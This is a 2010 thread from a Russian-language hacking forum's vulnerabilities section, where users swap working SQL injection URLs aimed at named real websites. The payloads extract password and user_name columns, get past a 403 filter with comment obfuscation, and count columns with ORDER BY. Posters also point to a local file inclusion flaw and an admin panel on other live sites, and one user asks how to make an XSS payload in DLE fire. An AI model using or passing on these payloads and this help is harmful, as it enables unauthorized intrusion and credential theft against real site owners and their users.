HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14381  
Старый 14.07.2010, 17:41
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Цитата:
Сообщение от Seravin  
Seravin said:
Код:
Code:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass
помогите подобрать логин плз
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min
 
Ответить с цитированием

  #14382  
Старый 14.07.2010, 21:00
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Сообщение от haito  
haito said:
Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1
Ошибка 403.
А вот так:
Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+
Работает.
Как обойти?
Код:
Code:
http://www.crossfitnb.com/archive.php?month=-2009-03%27+Union+select+1,2,3,4,version(),6,7,8,9,10+--+
 
Ответить с цитированием

  #14383  
Старый 14.07.2010, 22:18
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

всем привет!

-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

не могу найти принтабельное поле...
 
Ответить с цитированием

  #14384  
Старый 14.07.2010, 23:11
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Цитата:
Сообщение от 547  
547 said:
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
там нет ничего
 
Ответить с цитированием

  #14385  
Старый 14.07.2010, 23:58
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от 547  
547 said:
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
можно вопрос? как вы узнали сколько там полей? спасибо.
 
Ответить с цитированием

  #14386  
Старый 15.07.2010, 00:02
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
можно вопрос? как вы узнали сколько там полей? спасибо.
да как всегда, через order by по выводу ошибки

-->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/mobilex.pl/banery.php
 
Ответить с цитированием

  #14387  
Старый 15.07.2010, 00:19
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
можно вопрос? как вы узнали сколько там полей? спасибо.
id=-153 order by 8++&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

Здесь есть второй под запрос.

http://www.mobilex.pl/istats5/login.php

http://www.filipov.pl/istats5/index.php?p=admin - раскопаешь этот двиг = Profit!

я уже LFI в нём нашёл http://www.mobilex.pl//istats5/winday.php?r=ololo

Остальное за тобой.
 
Ответить с цитированием

  #14388  
Старый 15.07.2010, 01:12
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от AC//DC  
AC//DC said:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min
чтобы всё так просто было не постил бы
 
Ответить с цитированием

  #14389  
Старый 15.07.2010, 14:24
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:
у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..
вот и хотелось бы узнать, что я не так делаю, а не слушать тут пустые наезды и понты
 
Ответить с цитированием

  #14390  
Старый 15.07.2010, 15:23
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию

Есть псивная xss в DLE.

Цитата:
Сообщение от None  
site.ru/engine/modules/imagepreview.php?image=javajavascriptscript:alert( String.fromCharCode(120,115,115))
При открытии ее в строке,страница сворачивается и все. Как можно хотя бы, вывести алерт? Должен вылететь алерт с надписью xss... Но ничего не происходит.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ